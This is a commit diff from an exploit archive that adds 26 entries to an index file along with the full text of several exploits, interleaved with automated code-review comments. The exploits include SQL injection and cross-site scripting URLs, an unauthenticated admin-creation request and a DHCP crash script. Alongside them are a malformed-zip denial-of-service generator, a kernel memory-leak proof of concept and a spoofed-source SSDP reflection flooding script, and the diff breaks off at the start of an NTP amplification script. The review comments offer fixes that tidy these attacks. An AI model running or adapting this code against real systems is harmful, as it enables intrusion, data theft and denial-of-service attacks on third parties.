DB: 2015-07-11
26 new exploits
parent
c1528e8ee0
commit
e8f22fe4b6
27 changed files with 1135 additions and 0 deletions
26
files.csv
26
files.csv
|
@ -33679,6 +33679,7 @@ id,file,description,date,author,platform,type,port
|
|||
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
|
||||
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
|
||||
37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,rebel,linux,local,0
|
||||
37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900
|
||||
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
|
||||
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure Vulnerability",2012-05-28,L3b-r1'z,php,webapps,0
|
||||
37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection Vulnerability",2012-05-29,dex,php,webapps,0
|
||||
|
@ -33839,6 +33840,7 @@ id,file,description,date,author,platform,type,port
|
|||
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
|
||||
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
|
||||
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
|
||||
37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
|
||||
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
|
||||
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
|
||||
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
|
||||
|
@ -33869,6 +33871,7 @@ id,file,description,date,author,platform,type,port
|
|||
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
|
||||
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
|
||||
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
|
||||
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
|
||||
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
|
||||
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
|
||||
37529,platforms/php/webapps/37529.txt,"WordPress MDC YouTube Downloader Plugin 2.1.0 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
|
||||
|
@ -33877,3 +33880,26 @@ id,file,description,date,author,platform,type,port
|
|||
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
|
||||
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3_ 1.8.2_ 1.9.0 - Stored XSS Vulnerability",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
|
||||
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,metasploit,multiple,remote,0
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
|
||||
37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross Site Scripting Vulnerability",2012-07-25,"High-Tech Bridge SA",php,webapps,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection Vulnerability",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection Vulnerability",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow Vulnerability",2012-07-25,coolkaveh,windows,remote,0
|
||||
37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability",2012-07-26,"Jay Fenlason",linux,local,0
|
||||
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 'redirect' Parameter URI Redirection Vulnerability",2012-07-29,"Aung Khant",php,webapps,0
|
||||
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
|
||||
37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload Vulnerability",2012-07-30,"Mario Ceballos",php,webapps,0
|
||||
37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass Vulnerability",2012-07-30,"Mario Ceballos",cgi,webapps,0
|
||||
37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0
|
||||
37551,platforms/php/webapps/37551.txt,"phpBB Multiple SQL Injection Vulnerabilities",2012-07-28,HauntIT,php,webapps,0
|
||||
37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross Site Scripting Vulnerability",2012-07-29,MustLive,php,webapps,0
|
||||
37553,platforms/php/webapps/37553.txt,"eNdonesia 'cid' Parameter SQL Injection Vulnerability",2012-07-29,Crim3R,php,webapps,0
|
||||
37554,platforms/php/webapps/37554.txt,"Limny 'index.php' Multiple SQL Injection Vulnerabilities",2012-07-31,L0n3ly-H34rT,php,webapps,0
|
||||
37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager Multiple SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
|
||||
37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0
|
||||
37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
|
||||
37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0
|
||||
37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
|
||||
37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
|
||||
|
|
|
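Review bot: The new row `37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass Vulnerability",…` (like the sibling rows 37547 and 37548) names version 9.0.1.19899, while the advisory text added in platforms/cgi/webapps/37549.txt states `Scrutinizer 9.5.0 is vulnerable`; one of the two should be corrected so that anyone checking an installed version against this index is not misled. The added rows are also not in id order: 37561 is inserted between 37293 and 37329 in the first hunk and 37546 between 37489 and 37492 in the second, while the remaining 375xx ids are appended in sequence in the last hunk; if the file is meant to be sorted by id, those two rows belong in the last block. The hunks themselves are unchanged-context plus one or more appended rows, so no other field was checked here.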
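--- a/platforms/cgi/webapps/37549.txt
+++ b/platforms/cgi/webapps/37549.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/54727/info
+
+Scrutinizer is prone to an authentication-bypass vulnerability.
+
+Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
+
+Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
+
+#Request
+POST /cgi-bin/admin.cgi HTTP/1.1
+Host: 10.70.70.212
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Content-Length: 70
+
+tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
+
+#Response
+HTTP/1.1 200 OK
+Date: Wed, 25 Apr 2012 17:52:15 GMT
+Server: Apache
+Vary: Accept-Encoding
+Content-Length: 19
+Content-Type: text/html; charset=utf-8
+
+{"new_user_id":"2"}
+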
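Review bot: The advisory never states what the bypass consists of; the only evidence is that the recorded POST to /cgi-bin/admin.cgi carries no Cookie or Authorization header and the server still answers `{"new_user_id":"2"}`, which reads as a user being created without any session. A one-line remark after `#Request`, such as `# note: no session cookie or auth header is sent; the server still creates the user`, would make the finding explicit for readers and for anyone building a detection around unauthenticated requests to this endpoint. The `Host: 10.70.70.212` value is a lab address left over from the original capture; the other advisories in this commit use www.example.com, which would be the consistent placeholder.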
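--- a/platforms/java/webapps/37555.txt
+++ b/platforms/java/webapps/37555.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54756/info
+
+ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-
+
+http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search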
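--- a/platforms/java/webapps/37557.txt
+++ b/platforms/java/webapps/37557.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54759/info
+
+ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ManageEngine Applications Manager 10.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/MyPage.do?method=viewDashBoard&forpage=1&addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION]
+
+http://www.example.com/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-10000624'+AND+substring(version(),1)=4
+[BLIND SQL-INJECTION]&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)
+
+http://www.example.com/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs
+
+http://www.example.com/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&addNewTab=true&selectedpageid=10000014
+
+http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
+
+http://www.example.com/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes
+
+http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do
+
+http://www.example.com/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C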
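--- a/platforms/jsp/webapps/37550.txt
+++ b/platforms/jsp/webapps/37550.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54733/info
+
+DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities.
+
+Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS
+
+http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp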
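--- a/platforms/linux/dos/37538.py
+++ b/platforms/linux/dos/37538.py
@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/54665/info
+
+ISC DHCP is prone to multiple denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.
+
+#!/usr/bin/python
+'''
+SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
+service(infinite loop and CPU consumption/chew) via zero'ed client name length
+
+http://www.k1p0d.com
+
+'''
+
+import socket
+import getopt
+from sys import argv
+
+def main():
+args = argv[1:]
+try:
+args, useless = getopt.getopt(args, 'p:h:')
+args = dict(args)
+args['-p']
+args['-h']
+except:
+usage(argv[0])
+exit(-1)
+
+dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x22\x5f\xae'
+'\xa7\xdf\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x63\x82\x53\x63'
+'\x35\x01\x03\x32\x04\x0a\x00\x00'
+'\x01\x0c\x00'
+'\x37\x0d\x01\x1c\x02\x03\x0f'
+'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
+'\xff\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00\x00\x00\x00\x00'
+'\x00\x00\x00\x00')
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+sock.connect((args['-h'], int(args['-p'])))
+sock.sendall(dhcp_req_packet)
+print 'Packet sent'
+sock.close()
+
+def usage(pyname):
+print '''
+Usage: %s -h <host> -p <port>
+''' % pyname
+
+if __name__ == "__main__":
+main()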
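Review bot: The module docstring's first line reads `SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of`, while the advisory header a few lines above names the product as ISC DHCP; the docstring should read `ISC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of`. The bare `except:` in main() also swallows SystemExit and KeyboardInterrupt, so an interrupt during option parsing is reported as a usage error; `except (getopt.GetoptError, KeyError):` names the two failures the try block can actually raise. The `print` statements are Python 2 syntax that the `#!/usr/bin/python` shebang does not pin, so a docstring line such as `Python 2 only (uses the print statement)` would save readers a confusing SyntaxError. Indentation appears to have been lost in this rendering, so the bodies of main() and usage() cannot be checked for layout here.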
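--- a/platforms/linux/dos/37546.pl
+++ b/platforms/linux/dos/37546.pl
@@ -0,0 +1,28 @@
+#!/usr/bin/perl
+#
+# Title: File Roller - DoS PoC
+# Date: 08/07/2015
+# Author: Arsyntex
+# Homepage: https://wiki.gnome.org/Apps/FileRoller
+# Version: v3.4.1
+# Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux
+# -------------------------------------------------------------------------
+# Create a zip file with a folder inside named: #
+#
+# Run: file-roller --extract-here test.zip
+#
+# Result: endless call's of lstat64() (50 % CPU usage) (Freeze app)
+#
+
+$zip = "\x50\x4b\x03\x04\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46\x00\x00" .
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x23\x2f" .
+"\x50\x4b\x01\x02\x3f\x03\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46" .
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" .
+"\x00\x00\x00\x00\x00\x00\x10\x80\xfd\x41\x00\x00\x00\x00\x23\x2f" .
+"\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x30\x00\x00\x00" .
+"\x20\x00\x00\x00\x00\x00";
+
+open FILE, ">poc.zip" or die("Can't open poc.zip\n") ;
+binmode(FILE) ;
+print FILE $zip ;
+close FILE ;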
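--- a/platforms/linux/local/37543.c
+++ b/platforms/linux/local/37543.c
@@ -0,0 +1,150 @@
+source: http://www.securityfocus.com/bid/54702/info
+
+The Linux kernel is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+/***************** rds_client.c ********************/
+
+int main(void)
+{
+int sock_fd;
+struct sockaddr_in serverAddr;
+struct sockaddr_in toAddr;
+char recvBuffer[128] = "data from client";
+struct msghdr msg;
+struct iovec iov;
+
+sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
+if (sock_fd < 0) {
+perror("create socket error\n");
+exit(1);
+}
+
+memset(&serverAddr, 0, sizeof(serverAddr));
+serverAddr.sin_family = AF_INET;
+serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+serverAddr.sin_port = htons(4001);
+
+if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
+perror("bind() error\n");
+close(sock_fd);
+exit(1);
+}
+
+memset(&toAddr, 0, sizeof(toAddr));
+toAddr.sin_family = AF_INET;
+toAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+toAddr.sin_port = htons(4000);
+msg.msg_name = &toAddr;
+msg.msg_namelen = sizeof(toAddr);
+msg.msg_iov = &iov;
+msg.msg_iovlen = 1;
+msg.msg_iov->iov_base = recvBuffer;
+msg.msg_iov->iov_len = strlen(recvBuffer) + 1;
+msg.msg_control = 0;
+msg.msg_controllen = 0;
+msg.msg_flags = 0;
+
+if (sendmsg(sock_fd, &msg, 0) == -1) {
+perror("sendto() error\n");
+close(sock_fd);
+exit(1);
+}
+
+printf("client send data:%s\n", recvBuffer);
+
+memset(recvBuffer, '\0', 128);
+
+msg.msg_name = &toAddr;
+msg.msg_namelen = sizeof(toAddr);
+msg.msg_iov = &iov;
+msg.msg_iovlen = 1;
+msg.msg_iov->iov_base = recvBuffer;
+msg.msg_iov->iov_len = 128;
+msg.msg_control = 0;
+msg.msg_controllen = 0;
+msg.msg_flags = 0;
+if (recvmsg(sock_fd, &msg, 0) == -1) {
+perror("recvmsg() error\n");
+close(sock_fd);
+exit(1);
+}
+
+printf("receive data from server:%s\n", recvBuffer);
+
+close(sock_fd);
+
+return 0;
+}
+
+/***************** rds_server.c ********************/
+
+int main(void)
+{
+struct sockaddr_in fromAddr;
+int sock_fd;
+struct sockaddr_in serverAddr;
+unsigned int addrLen;
+char recvBuffer[128];
+struct msghdr msg;
+struct iovec iov;
+
+sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
+if(sock_fd < 0) {
+perror("create socket error\n");
+exit(0);
+}
+
+memset(&serverAddr, 0, sizeof(serverAddr));
+serverAddr.sin_family = AF_INET;
+serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
+serverAddr.sin_port = htons(4000);
+if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
+perror("bind error\n");
+close(sock_fd);
+exit(1);
+}
+
+printf("server is waiting to receive data...\n");
+msg.msg_name = &fromAddr;
+
+/*
+* I add 16 to sizeof(fromAddr), ie 32,
+* and pay attention to the definition of fromAddr,
+* recvmsg() will overwrite sock_fd,
+* since kernel will copy 32 bytes to userspace.
+*
+* If you just use sizeof(fromAddr), it works fine.
+* */
+msg.msg_namelen = sizeof(fromAddr) + 16;
+/* msg.msg_namelen = sizeof(fromAddr); */
+msg.msg_iov = &iov;
+msg.msg_iovlen = 1;
+msg.msg_iov->iov_base = recvBuffer;
+msg.msg_iov->iov_len = 128;
+msg.msg_control = 0;
+msg.msg_controllen = 0;
+msg.msg_flags = 0;
+
+while (1) {
+printf("old socket fd=%d\n", sock_fd);
+if (recvmsg(sock_fd, &msg, 0) == -1) {
+perror("recvmsg() error\n");
+close(sock_fd);
+exit(1);
+}
+printf("server received data from client:%s\n", recvBuffer);
+printf("msg.msg_namelen=%d\n", msg.msg_namelen);
+printf("new socket fd=%d\n", sock_fd);
+strcat(recvBuffer, "--data from server");
+if (sendmsg(sock_fd, &msg, 0) == -1) {
+perror("sendmsg()\n");
+close(sock_fd);
+exit(1);
+}
+}
+
+close(sock_fd);
+return 0;
+}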
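Review bot: The file concatenates two separate programs, rds_client.c and rds_server.c, each with its own `int main(void)` and separated only by the banner comments, and neither half carries any `#include` lines, so the file as committed is not a single translation unit; a header comment stating that the two halves must be split into separate files and which socket/netinet headers they expect would make that explicit instead of leaving it to the reader. In the server half `unsigned int addrLen;` is declared and never used, and the commented-out `/* msg.msg_namelen = sizeof(fromAddr); */` merely repeats what the preceding explanatory comment about `sizeof(fromAddr) + 16` already says, so that explanatory comment is the part worth keeping. The client's `perror("sendto() error\n")` follows a `sendmsg()` call and so names the wrong function; `perror("sendmsg() error")` fixes the name, and dropping the embedded newline keeps perror's own `: strerror` suffix on the same line.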
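--- a/platforms/multiple/dos/37561.pl
+++ b/platforms/multiple/dos/37561.pl
@@ -0,0 +1,134 @@
+#!/usr/bin/perl
+#
+# upnpd M-SEARCH ssdp:discover reflection
+#
+# Copyright 2015 (c) Todor Donev
+# todor.donev@gmail.com
+# http://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# The SSDP protocol can discover Plug & Play devices,
+# with uPnP (Universal Plug and Play). SSDP is HTTP
+# like protocol and work with NOTIFY and M-SEARCH
+# methods.
+#
+#
+# Disclaimer:
+# This or previous program is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use at your own risk and educational
+# purpose ONLY!
+#
+# Wireshark:
+# udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
+#
+# See also:
+# SSDP Reflection DDoS Attacks
+# http://tinyurl.com/mqwj6xt
+#
+
+use Socket;
+
+if ( $< != 0 ) {
+print "Sorry, must be run as root!\n";
+print "This script use RAW Socket.\n";
+exit;
+}
+
+my $ssdp = (gethostbyname($ARGV[0]))[4]; # IP Address Source (32 bits)
+my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
+
+print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";
+if (!defined $ssdp || !defined $victim) {
+print "[ Usage: $0 <upnpd> <victim>\n";
+print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
+exit;
+}
+print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";
+socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
+setsockopt(RAW, 0, 1, 1) or die $!;
+main();
+
+# Main program
+sub main {
+my $packet;
+
+$packet = iphdr();
+$packet .= udphdr();
+$packet .= payload();
+# b000000m...
+send_packet($packet);
+}
+
+# IP header (Layer 3)
+sub iphdr {
+my $ip_ver = 4; # IP Version 4 (4 bits)
+my $iphdr_len = 5; # IP Header Length (4 bits)
+my $ip_tos = 0; # Differentiated Services (8 bits)
+my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
+my $ip_frag_id = 0; # Identification Field (16 bits)
+my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
+my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
+my $ip_ttl = 255; # IP TTL (8 bits)
+my $ip_proto = 17; # IP Protocol (8 bits)
+my $ip_checksum = 0; # IP Checksum (16 bits)
+# IP Packet construction
+my $iphdr = pack(
+'H2 H2 n n B16 h2 c n a4 a4',
+$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
+$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
+$ip_ttl, $ip_proto, $ip_checksum,
+$victim, $ssdp
+);
+return $iphdr;
+}
+
+# UDP header (Layer 4)
+sub udphdr {
+my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
+my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
+my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
+my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
+
+# UDP Packet
+my $udphdr = pack(
+'n n n n',
+$udp_src_port, $udp_dst_port,
+$udp_len, $udp_checksum
+);
+return $udphdr;
+}
+
+# SSDP HTTP like (Layer 7)
+sub payload {
+my $data;
+$data .= "M-SEARCH * HTTP\/1.1\r\n";
+# $data .= "HOST:239.255.255.250:1900\r\n"; # Multicast address
+$data .= "ST:upnp:rootdevice\r\n"; # Search target, search for root devices only
+$data .= "MAN:\"ssdp:discover\"\r\n";
+# $data .= "MX:3\r\n\r\n"; # Seconds to delay response
+my $payload = pack('a' . length($data), $data);
+return $payload;
+}
+
+sub send_packet {
+while(1){
+select(undef, undef, undef, 0.10); # Sleeping 100 milliseconds
+send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!;
+}
+}
+
+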
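Review bot: Both address comments, on the `my $ssdp` and `my $victim` lines, read `# IP Address Source (32 bits)`, but `$ssdp` is packed into the destination slot of the IP header in iphdr() (the trailing `a4 a4` pair is `$victim, $ssdp`) and is the send target in send_packet(), so the first should read `# IP Address Destination (32 bits)`, as the companion script 37562.pl in this commit already has it. In udphdr() the comments `# UDP Sort Port` and `(16 btis)` should be `# UDP Source Port` and `(16 bits)`, and `(XOR of header)` misdescribes what a UDP checksum is; since the field is simply left at zero here, `# UDP Checksum (16 bits) (left at 0)` would describe the code rather than the protocol. Indentation appears to have been lost in this rendering, so the layout of the sub bodies cannot be checked here.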
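--- a/platforms/multiple/dos/37562.pl
+++ b/platforms/multiple/dos/37562.pl
@@ -0,0 +1,195 @@
+#!/usr/bin/perl
+#
+# ntp MON_GETLIST query amplification ddos
+#
+# Copyright 2015 (c) Todor Donev
+# todor.donev@gmail.com
+# http://www.ethical-hacker.org/
+# https://www.facebook.com/ethicalhackerorg
+#
+# A Network Time Protocol (NTP) Amplification
+# attack is an emerging form of Distributed
+# Denial of Service (DDoS) that relies on the
+# use of publically accessible NTP servers to
+# overwhelm a victim system with UDP traffic.
+# The NTP service supports a monitoring service
+# that allows administrators to query the server
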